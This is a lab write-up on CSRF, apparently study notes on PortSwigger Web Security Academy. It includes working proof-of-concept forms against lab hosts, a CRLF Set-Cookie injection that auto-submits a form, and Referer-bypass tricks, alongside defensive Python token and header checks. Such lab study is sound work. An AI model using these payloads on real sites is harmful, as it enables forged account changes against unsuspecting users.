CSRF (Cross Site Request Forgery)
2022-08-02 04:02:00 【CHIAJ176】
These notes record the CSRF vulnerability types covered by the PortSwigger Web Security Academy labs.
- A relevant action. There is an action within the application that the attacker has a reason to induce. This might be a privileged action (such as modifying permissions for other users) or any action on user-specific data (such as changing the user's own password).
- Cookie-based session handling. Performing the action involves issuing one or more HTTP requests, and the application relies solely on session cookies to identify the user who made the request. There is no other mechanism in place for tracking sessions or validating user requests.
- No unpredictable request parameters. The request that performs the action does not contain any parameters whose values the attacker cannot determine or guess. For example, when causing a user to change their password, the function is not vulnerable if the attacker needs to know the value of the existing password.
- CSRF token
- SameSite cookie attribute
CSRF vulnerability with no defenses
As the name says, there are no defenses against CSRF at all. The session is maintained only by a cookie or session identifier, so a CSRF vulnerability necessarily exists.
<form method="$method" action="$url">
<input type="hidden" name="$param1name" value="$param1value">
</form>
CSRF where token validation depends on request method
Besides the cookie used for authentication, there is also a csrf token used to validate the request.
The problem is that when the data is submitted with POST, the csrf token is validated; but if the request method is changed (POST to GET), the csrf token is not validated at all. A CSRF vulnerability therefore exists.
CSRF where token validation depends on token being present
Similar to the request-method case above, a token exists, but this lab is not about changing the request method. The vulnerability is that the token is validated correctly when it is present, but validation is skipped if the token is omitted. In this situation an attacker can remove the entire parameter containing the token (not just its value) to bypass validation and mount a CSRF attack.
CSRF where token is not tied to the user session
The requests look like the ones above. Some applications do not validate that the token belongs to the same session as the user who is making the request. Instead, the application maintains a global pool of tokens that it has issued and accepts any token that appears in this pool.
In this situation, the attacker can log in to the application using their own account, obtain a valid token, and then feed that token to the victim user in their CSRF attack.
<form method="POST" action="https://ac2f1fe71f3b1e8cc00625ba00f900fc.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="8XVl6nxXiMUEC2ZYJ8djwL39mPPcvzyy">
</form>
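The three labs above (token checked only for POST, token check skipped when the parameter is absent, token accepted from a global pool) are all failures of the same server-side gate. The following Python is an added example, not code from the page or from PortSwigger, showing a synchronizer-token check that closes all three: the in-memory SESSIONS store, the session identifiers and the form bodies are constructed for the demonstration.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed in-memory session store standing in for the application's
# session framework. Each session carries exactly one CSRF token.
SESSIONS: dict = {}


def start_session() -> str:
    """Create a session and mint a CSRF token that lives only in that session."""
    session_id = secrets.token_urlsafe(24)
    SESSIONS[session_id] = {"csrf": secrets.token_urlsafe(32)}
    return session_id


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def authorize_state_change(method: str, session_id: str, body: str) -> bool:
    """Gate for a state-changing action such as /my-account/change-email.

    Each rule closes one of the three token failure modes described above:
    1. Only POST is accepted, so rewriting the request as GET never reaches a
       code path that skips the check.
    2. The csrf field must be present; omitting the whole parameter is a
       rejection, not a reason to skip validation.
    3. The token is compared only against the one stored in *this* session,
       so a token minted for another account (the attacker's own) is rejected.
    """
    if method.upper() != "POST":
        return False
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    presented = parse_form(body).get("csrf")
    if not presented:
        return False
    # Constant-time comparison on bytes, so a non-ASCII value cannot raise.
    return hmac.compare_digest(session["csrf"].encode(), presented.encode())


def demo() -> dict:
    """Exercise the four situations from the labs above; returns outcome by name."""
    victim = start_session()
    attacker = start_session()
    victim_token = SESSIONS[victim]["csrf"]
    attacker_token = SESSIONS[attacker]["csrf"]
    return {
        "legitimate_post": authorize_state_change(
            "POST", victim, f"csrf={victim_token}&email=user%40example.com"),
        "get_without_token": authorize_state_change(
            "GET", victim, "email=attacker%40example.com"),
        "post_token_omitted": authorize_state_change(
            "POST", victim, "email=attacker%40example.com"),
        "post_other_sessions_token": authorize_state_change(
            "POST", victim, f"csrf={attacker_token}&email=attacker%40example.com"),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'allowed' if allowed else 'rejected'}")
```

Only the first case is allowed. The important design point is that the token is looked up through the caller's own session rather than in a shared table, so possessing any valid token is not enough; it has to be the one minted for the session that sends the request.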
CSRF where token is tied to a non-session cookie
Some applications tie the CSRF token to a cookie, but not to the same cookie that is used to track sessions. Changing the session cookie logs you out, but changing the csrfKey cookie only causes the CSRF token to be rejected. This suggests that the csrfKey cookie may not be strictly tied to the session.
This can easily happen when an application uses two different frameworks, one for session handling and one for CSRF protection, which are not integrated together.
This situation is harder to exploit but is still vulnerable. If the website contains any behaviour that allows an attacker to set a cookie in the victim's browser, an attack is possible. The attacker can log in to the application using their own account, obtain a valid token and associated cookie, use the cookie-setting behaviour to place their cookie into the victim's browser, and feed their token to the victim in their CSRF attack.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="https://acc21f311f942a71c072031e00990034.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="csrf" value="lmjIpDMzZjMT1DytwERXkQu1CVHdk0H1" />
<input type="submit" value="Submit request" />
</form>
<img src="https://acc21f311f942a71c072031e00990034.web-security-academy.net/?search=heason%0d%0aSet-Cookie:%20csrfKey=B2AjipewNVuxVWu2XLzHNo9cxG5fVw3V" onerror=document.forms[0].submit();>
CSRF where token is duplicated in a cookie (double-submit defense)
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa
csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&[email protected]
In this situation, if the website contains any cookie-setting functionality, the attacker can again perform a CSRF attack. Here, the attacker does not need to obtain a valid token of their own. They simply invent a token (perhaps in the required format, if that is checked), use the cookie-setting behaviour to place their cookie into the victim's browser, and feed their token to the victim in their CSRF attack.
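Both this lab and the csrfKey lab above succeed because the server only asks whether the cookie and the form field agree, never whether the cookie was minted for the user who is sending the request. The Python below is an added example (not code from the page or from PortSwigger) that places the naive double-submit check beside a signed variant in which the cookie value carries an HMAC over the session identifier, so a value planted by someone else fails verification. SERVER_KEY, the session identifiers and the "invented" token are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side key, constructed for this example only.
SERVER_KEY = b"constructed-example-key-not-for-real-use"


def naive_double_submit_ok(cookie_csrf, form_csrf) -> bool:
    """The pattern the lab breaks: the request is accepted whenever the cookie
    and the form field carry the same value. Nothing ties that value to the
    user, so whoever can plant the cookie also controls the form field."""
    if not cookie_csrf or not form_csrf:
        return False
    return hmac.compare_digest(cookie_csrf.encode(), form_csrf.encode())


def mint_signed_csrf_cookie(session_id: str) -> str:
    """Cookie value = nonce.HMAC(key, session_id:nonce). It verifies only for
    the session it was minted for, so a copy planted into another user's
    browser is useless there."""
    nonce = secrets.token_hex(16)
    tag = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def signed_double_submit_ok(session_id: str, cookie_csrf, form_csrf) -> bool:
    """Hardened check: cookie and form must match *and* the cookie must carry
    a valid tag for the session that is sending the request."""
    if not cookie_csrf or not form_csrf:
        return False
    if not hmac.compare_digest(cookie_csrf.encode(), form_csrf.encode()):
        return False
    nonce, sep, tag = cookie_csrf.partition(".")
    if not sep or not nonce or not tag:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag.encode(), expected.encode())


def demo() -> dict:
    """Replays the two cookie-planting scenarios from the page against both checks."""
    victim_session = "victim-session-id"        # constructed session identifiers
    attacker_session = "attacker-session-id"
    legitimate = mint_signed_csrf_cookie(victim_session)
    invented = "Invented000000000000000000000000"          # attacker-invented value (this lab)
    attackers_own = mint_signed_csrf_cookie(attacker_session)  # attacker's real token (csrfKey lab)
    return {
        "naive_invented_value": naive_double_submit_ok(invented, invented),
        "signed_legitimate": signed_double_submit_ok(victim_session, legitimate, legitimate),
        "signed_invented_value": signed_double_submit_ok(victim_session, invented, invented),
        "signed_attackers_own_token": signed_double_submit_ok(victim_session, attackers_own, attackers_own),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'allowed' if allowed else 'rejected'}")
```

The naive check accepts the invented pair; the signed check accepts only the token minted for the victim's own session. Binding the tag to the session identifier is what makes the cookie-setting behaviour harmless to this check, though that behaviour (here, header injection through the search parameter) is still a bug in its own right and should be fixed separately.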
CSRF where Referer validation depends on header being present
Besides CSRF tokens, some applications also use the HTTP Referer header to try to defend against CSRF attacks, usually by verifying that the request originated from the application's own domain. Removing the Referer header entirely causes the validation to be skipped.
<script>history.pushState('', '', '/')</script>
<form action="https://ac4b1f4e1fa1b272c07211b9003e00c7.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
<meta name="referrer" content="never">
CSRF with broken Referer validation
Unlike the header-presence lab above, deleting the Referer header does not skip the validation here.
Some applications validate the Referer header in a naive way that can be bypassed. For example, if the application checks whether the domain in the Referer starts with the expected value, the attacker can place it as a subdomain of their own domain.
Similarly, if the application merely validates that the Referer contains its own domain name, the attacker can place the required value elsewhere in the URL.
Although you may be able to identify this behaviour using Burp, you will often find that this approach no longer works when you test the proof of concept in the browser. To reduce the risk of exposing sensitive data in this way, many browsers now strip the query string from the Referer header by default.
You can override this behaviour by making sure that the response containing your exploit sets the header Referrer-Policy: unsafe-url (note that the spelling is correct in this case, just to make sure you are paying attention!). This ensures that the full URL, including the query string, is sent.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-Policy: unsafe-url
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/?aceb1fe31e57ca0bc05a89f500e30013.web-security-academy.net')</script>
<form action="https://aceb1fe31e57ca0bc05a89f500e30013.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
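The two Referer labs fail for complementary reasons: one skips the check when the header is absent, the other compares the header as a string prefix or substring. The Python below is an added example (not code from the page or from PortSwigger) of a check that parses the header, compares the hostname exactly, prefers the Origin header when it is present, and fails closed when neither header arrives. The expected host vulnerable-website.com is the one from the request shown on this page; attacker-site.com is a constructed placeholder.

```python
from typing import Optional
from urllib.parse import urlsplit

# The application's own host, taken from the request shown earlier on this page.
EXPECTED_HOST = "vulnerable-website.com"


def host_of(url: str) -> Optional[str]:
    """Return the parsed hostname of an absolute http(s) URL, or None."""
    try:
        parts = urlsplit(url)
        hostname = parts.hostname
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not hostname:
        return None
    return hostname.lower()


def request_origin_is_trusted(origin: Optional[str], referer: Optional[str]) -> bool:
    """Decide whether a state-changing request came from our own site.

    - Prefer the Origin header: browsers send it on cross-site POSTs and no
      Referrer-Policy strips it. Fall back to Referer only when Origin is absent.
    - Compare the *parsed hostname* for exact equality, so a prefix match
      (our host used as a subdomain of the attacker's) and a substring match
      (our host hidden in the path or query) both fail.
    - If neither header is present, fail closed instead of skipping the check.
    """
    for header in (origin, referer):
        if header:
            return host_of(header) == EXPECTED_HOST
    return False


def demo() -> dict:
    """Cases from this section; returns the decision for each by name."""
    cases = {
        "same_site": ("https://vulnerable-website.com", "https://vulnerable-website.com/my-account"),
        "referer_only_same_site": (None, "https://vulnerable-website.com/my-account"),
        "subdomain_prefix_trick": (None, "https://vulnerable-website.com.attacker-site.com/"),
        "value_in_query_trick": (None, "https://attacker-site.com/?vulnerable-website.com"),
        "value_in_path_trick": (None, "https://attacker-site.com/vulnerable-website.com"),
        "headers_removed": (None, None),
        "opaque_null_origin": ("null", None),
    }
    return {name: request_origin_is_trusted(o, r) for name, (o, r) in cases.items()}


if __name__ == "__main__":
    for name, trusted in demo().items():
        print(f"{name}: {'trusted' if trusted else 'rejected'}")
```

Because only the hostname is compared, the check is indifferent to whether the browser's referrer policy stripped the path and query, which is exactly the part an attacker controls in the substring bypass. Header-based checks remain a secondary defence; the session-bound token is still the primary one.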